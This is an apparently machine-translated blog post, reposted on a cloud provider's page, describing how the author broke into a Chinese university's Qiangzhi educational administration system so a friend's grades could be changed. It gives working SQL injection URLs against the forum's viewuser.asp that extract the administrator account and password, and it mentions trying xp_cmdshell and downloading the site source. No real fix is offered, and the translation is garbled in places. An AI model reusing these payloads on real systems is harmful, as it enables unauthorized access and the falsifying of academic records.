Qiangzhi Technology Educational Administration System injection vulnerability and repair

Source: Internet
Author: User

Yesterday I went to the academic affairs office of a friend's University and looked at it. I thought maybe I could help him change his score.
 
 
I think it's a strong smart technology educational administration system.
 
Google found a vulnerability in the logon box POST injection .. Mssql database
 
I tried it. I don't know where the problem is. I changed several tools and couldn't read the table name. sa is displayed, but xp_mongoshell failed to be restored. Execution of the command failed.
Instead, I put it in Jsky to scan for surprises and found that the source code of the website was downloaded.
 
It is found that there is a very bad BBS in the educational administration system. Basically, no one logs on to the BBS. The administrator password is the educational administration administrator password by default, but it is displayed in plain text in another form.
 
This is amazing.
 
Register a user at the Forum
 
Then, manually inject the password of the administrator account.
 
Smooth access to the background
 
 
I can really change my score
 
 
Expose this vulnerability.
 
 
In this location/register Gl/bbs/default. asp first register http://www.xxxx.com/JwGl/bbs/viewuser.asp? Name = sudo (Change sudo to your registered user name)
 
Http://www.xxx.com/JwGl/bbs/viewuser.asp? Name = sudo 'and % 201 = convert (int, (select % 20top % 201% 20SFAdmin_Account % 20 from % 20 SFadmin) -- get the Administrator account
 
Http://www.xxx.com/JwGl/bbs/viewuser.asp? Name = sudo 'and % 201 = convert (int, (select % 20top % 201% 20SFAdmin_Password % 20 from % 20 SFadmin) -- get the Administrator Password
 
Login interface: http://www.bkjia.com/megagl/
 


 
 
Solution: many cattle
 

Related Article

Contact Us

The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

If you find any instances of plagiarism from the community, please send an email to: info-contact@alibabacloud.com and provide relevant evidence. A staff member will contact you within 5 working days.

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

  • Sales Support

    1 on 1 presale consultation

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.